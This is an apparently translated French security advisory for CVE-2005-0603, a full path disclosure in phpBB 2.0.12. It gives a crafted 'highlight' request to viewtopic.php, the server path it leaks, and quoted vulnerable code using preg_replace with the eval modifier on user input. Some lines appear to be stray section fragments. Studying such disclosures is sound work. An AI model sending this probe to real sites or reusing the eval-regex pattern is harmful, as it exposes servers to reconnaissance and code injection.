
Exploit de preuve de concept pour CVE-2005-0603, démontrant une vulnérabilité de divulgation de chemin complet dans phpBB 2.0.12 via une regex conçue dans le paramètre highlight de viewtopic.php.
Programme : phpBB 2.0.12 Page d'accueil : http://www.phpbb.com Versions vulnérables : phpBB 2.0.12 et versions antérieures Risque : Risque faible !! Impact : Divulgation du chemin complet
-==Divulgation du chemin complet dans phpBB 2.0.12==-
phpBB est un système de forum open source puissant, entièrement extensible et hautement personnalisable. Il offre une interface conviviale, un panneau d'administration simple et direct, ainsi qu'une FAQ utile. Basé sur le puissant langage serveur PHP et votre choix de serveurs de bases de données MySQL, MS-SQL, PostgreSQL ou Access/ODBC, phpBB est la solution communautaire gratuite idéale pour tous les sites web.
localhost et de nombreux forums
phpBB/viewtopic.php?p=6&highlight=[HaCkZaTaN]
Cela affichera quelque chose comme ceci :
Warning: Compilation failed: missing terminating ] for character class at offset 20 in /home/nst/forum/viewtopic.php(1110) : regexp code on line 1
Cela divulguera le chemin complet et j'ai aussi remarqué que les messages changent, rien ne s'affiche. Dans la variable HighLight
Voici le problème : -----[ Début du code vulnérable ] ------------------------------------
1106: if ($highlight_match)
1107: {
1108: // This was shamelessly 'borrowed' from volker at multiartstudio dot de
1109: // via php.net's annotated manual
1110: $message = str_replace('"', '"',
substr(preg_replace('#(>(((?>([^><]+|(?R)))*)<))#se', "preg_replace('#\b(" .
$highlight_match . ")\b#i', '<span style="color:#" . $theme['fontcolor3'] .
"">\\1', '\0')", '>' . $message . '<'), 1, -1)); 1111: }
-----[ Fin du code vulnérable ] ------------------------------------ Ne copiez pas des trucs comme ça lol.
Pas encore xD
Pas encore xD
Autre chose que j'ai remarquée dans php.ini :
magic_quotes_gpc = On magic_quotes_sybase = Off
Vous devez activer les deux.
Découvert par HaCkZaTaN [email protected]
[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/
Des questions ? http://neossecurity.net/
Irc.InfoGroup.cl #neosecurityteam
Paisterist
T0wn3r
Heap
Nitrous
CrashCool
eL_mEsIaS
Makoki
Et mon peuple colombien